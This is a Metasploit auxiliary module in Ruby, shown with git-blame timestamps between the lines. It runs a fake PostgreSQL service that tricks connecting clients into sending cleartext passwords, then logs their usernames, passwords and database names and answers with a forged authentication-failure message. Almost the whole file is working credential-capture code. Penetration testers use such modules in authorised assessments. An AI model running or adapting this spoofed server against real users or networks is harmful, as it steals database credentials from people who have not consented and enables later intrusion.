2012-10-02 09:46:37 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-10-02 09:46:37 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::TcpServer
|
|
|
|
include Msf::Auxiliary::Report
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Authentication Capture: PostgreSQL',
|
|
|
|
'Description' => %q{
|
|
|
|
This module provides a fake PostgreSQL service that is designed to
|
|
|
|
capture clear-text authentication credentials.},
|
|
|
|
'Author' => 'Dhiru Kholia <dhiru[at]openwall.com>',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' => [ [ 'Capture' ] ],
|
|
|
|
'PassiveActions' => [ 'Capture' ],
|
|
|
|
'DefaultAction' => 'Capture'
|
|
|
|
)
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 5432 ]),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# This module is based on MySQL capture module by Patrik Karlsson.
|
|
|
|
# Reference: http://www.postgresql.org/docs/9.2/static/protocol-message-formats.html
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def setup
|
|
|
|
super
|
|
|
|
@state = {}
|
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
|
|
|
|
exploit()
|
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2015-07-22 06:11:43 +00:00
|
|
|
def report_cred(opts)
|
|
|
|
service_data = {
|
|
|
|
address: opts[:ip],
|
|
|
|
port: opts[:port],
|
|
|
|
service_name: opts[:service_name],
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :service,
|
|
|
|
module_fullname: fullname,
|
|
|
|
username: opts[:user],
|
|
|
|
private_data: opts[:password],
|
2015-07-23 20:50:50 +00:00
|
|
|
private_type: :password
|
2015-07-22 06:11:43 +00:00
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: create_credential(credential_data),
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
proof: opts[:proof]
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_client_connect(c)
|
|
|
|
@state[c] = {
|
|
|
|
:name => "#{c.peerhost}:#{c.peerport}",
|
|
|
|
:ip => c.peerhost,
|
|
|
|
:port => c.peerport,
|
|
|
|
}
|
|
|
|
@state[c]["status"] = :init
|
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_client_data(c)
|
|
|
|
data = c.get_once
|
|
|
|
return if not data
|
|
|
|
length = data.slice(0, 4).unpack("N")[0]
|
|
|
|
if length == 8 and @state[c]["status"] == :init
|
|
|
|
# SSL request
|
|
|
|
c.put 'N'
|
|
|
|
@state[c]["status"] = :send_auth_type
|
|
|
|
elsif @state[c]["status"] == :send_auth_type
|
|
|
|
# Startup message
|
|
|
|
data.slice!(0, 4).unpack("N")[0] # skip over length
|
|
|
|
data.slice!(0, 4).unpack("N")[0] # skip over protocol
|
|
|
|
sdata = [ 0x52, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03 ].pack("C*")
|
|
|
|
c.put sdata
|
|
|
|
data.slice!(0, 5) # skip over "user\x00"
|
|
|
|
@state[c][:username] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
|
|
|
|
data.slice!(0, 9) # skip over "database\x00"
|
|
|
|
@state[c][:database] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
|
|
|
|
@state[c]["status"] = :pwn
|
|
|
|
elsif @state[c]["status"] == :pwn and data[0] == 'p'
|
|
|
|
# Password message
|
|
|
|
data.slice!(0, 5).unpack("N")[0] # skip over length
|
|
|
|
@state[c][:password] = data.slice!(0, data.index("\x00") + 1).unpack("Z*")[0]
|
2015-07-22 06:11:43 +00:00
|
|
|
report_cred(
|
|
|
|
ip: c.peerhost,
|
|
|
|
port: datastore['SRVPORT'],
|
|
|
|
service_name: 'psql_client',
|
|
|
|
user: @state[c][:username],
|
|
|
|
password: @state[c][:password],
|
|
|
|
proof: @state[c][:database]
|
2013-08-30 21:28:54 +00:00
|
|
|
)
|
|
|
|
print_status("PostgreSQL LOGIN #{@state[c][:name]} #{@state[c][:username]} / #{@state[c][:password]} / #{@state[c][:database]}")
|
|
|
|
# send failure message
|
|
|
|
sdata = [ 0x45, 97 - 8 + @state[c][:username].length].pack("CN")
|
|
|
|
sdata << "SFATAL"
|
|
|
|
sdata << "\x00"
|
|
|
|
sdata << "C28P01"
|
|
|
|
sdata << "\x00"
|
|
|
|
sdata << "Mpassword authentication failed for user \"#{@state[c][:username]}\""
|
|
|
|
sdata << "\x00"
|
|
|
|
sdata << "Fauth.c"
|
|
|
|
sdata << "\x00"
|
|
|
|
sdata << "L302"
|
|
|
|
sdata << "\x00"
|
|
|
|
sdata << "Rauth_failed"
|
|
|
|
sdata << "\x00\x00"
|
|
|
|
c.put sdata
|
|
|
|
c.close
|
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_client_close(c)
|
|
|
|
@state.delete(c)
|
|
|
|
end
|
2012-10-02 09:46:37 +00:00
|
|
|
end
|